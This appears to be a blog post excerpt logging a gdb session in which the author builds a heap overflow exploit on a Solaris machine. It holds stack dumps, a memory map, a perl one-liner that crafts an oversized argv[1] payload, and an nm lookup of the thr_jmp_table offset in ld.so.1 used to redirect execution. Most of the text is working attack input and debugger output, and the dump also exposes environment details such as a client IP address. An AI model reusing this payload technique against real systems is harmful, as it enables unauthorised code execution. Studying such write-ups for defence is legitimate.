0xffbef0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef100: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef110: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef120: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef130: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef140: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef150: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef160: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef170: 0x41007063 0x6c69623d 0x2f67726f 0x7570732f
0xffbef180: 0x756c6162 0x2f706364 0x65762f6c 0x6962004d
0xffbef190: 0x414e5041 0x54483d2f 0x686f6d65 0x2f62617a
0xffbef1a0: 0x7a2f746f 0x6f6c732f 0x73686172 0x652f6d61
0xffbef1b0: 0x6e3a2f68 0x6f6d652f 0x62617a7a 0x2f6e6f62
0xffbef1c0: 0x61636b75 0x702f696e 0x7374616c 0x6c2f7368
0xffbef1d0: 0x6172652f 0x6d616e3a 0x2f757372 0x2f736861
0xffbef1e0: 0x72652f6d 0x616e004e 0x4e545053 0x45525645
0xffbef1f0: 0x523d6e65 0x77732e63 0x732e756d 0x622e6564
(gdb)
0xffbef200: 0x75007063 0x6c696273 0x72633d2f 0x67726f75
0xffbef210: 0x70732f75 0x6c61622f 0x64657668 0x6f73742f
0xffbef220: 0x6c696263 0x00484f53 0x543d626c 0x61646537
0xffbef230: 0x32005445 0x524d3d78 0x7465726d 0x00534845
0xffbef240: 0x4c4c3d2f 0x686f6d65 0x2f62617a 0x7a2f746f
0xffbef250: 0x6f6c732f 0x62696e2f 0x62617368 0x00535348
0xffbef260: 0x5f434c49 0x454e543d 0x3139322e 0x3136382e
0xffbef270: 0x3130362e 0x32333720 0x34313339 0x32203232
0xffbef280: 0x0078756c 0x69623d2f 0x736f7572 0x6365732f
0xffbef290: 0x78696e75 0x2d70656e 0x7469756d 0x2f6c6962
0xffbef2a0: 0x0046434f 0x4445533d 0x2f657463 0x2f66696e
0xffbef2b0: 0x642e636f 0x64657300 0x5353485f 0x5454593d
0xffbef2c0: 0x2f646576 0x2f707473 0x2f330078 0x75696e63
0xffbef2d0: 0x3d2f736f 0x75726365 0x732f7869 0x6e752d70
0xffbef2e0: 0x656e7469 0x756d2f69 0x6e636c75 0x64650047
0xffbef2f0: 0x524f5550 0x3d756772 0x61640055 0x5345523d
0xffbef300: 0x62617a7a 0x004c535f 0x434f4c4f 0x52533d66
0xffbef310: 0x693d303b 0x33373a72 0x733d303a 0x64693d30
0xffbef320: 0x313b3338 0x3a6c6e3d 0x30313b33 0x363a6d68
0xffbef330: 0x3d30303a 0x70693d34 0x303b3333 0x3a736f3d
0xffbef340: 0x30313b33 0x353a646f 0x3d30313b 0x33353a62
0xffbef350: 0x643d3430 0x3b33333b 0x30313a63 0x643d3430
0xffbef360: 0x3b33333b 0x30313a6f 0x723d3430 0x3b33313b
0xffbef370: 0x30313a73 0x753d3337 0x3b34313a 0x73673d33
(gdb) info proc map
process 28421 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x11fff 0x2000 0 ----r-x
0x20000 0x21fff 0x2000 0 ----rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffaf8000 0xffbeffff 0xf8000 0xffffe000 -s--rwx
(gdb)
Make a TRULY LARGE argv[1].. I just tried 1 million and it worked just fine… The stack is forced to grow phenomenally downwards, giving me a safe “zone” to pass to the LD offset.. Here is blade72’s offset:
r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\x3e\x02\x14" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'` ^^^^ 0xff3e0234 thr_jmp_table address for blade72
bazz@blade72[pts/3][~/my_own_heap_exploit] nm /usr/lib/ld.so.1 | grep thr_jmp_table 00030234 d thr_jmp_table add to de-facto LD location: 0xff3b0000
Leave a Reply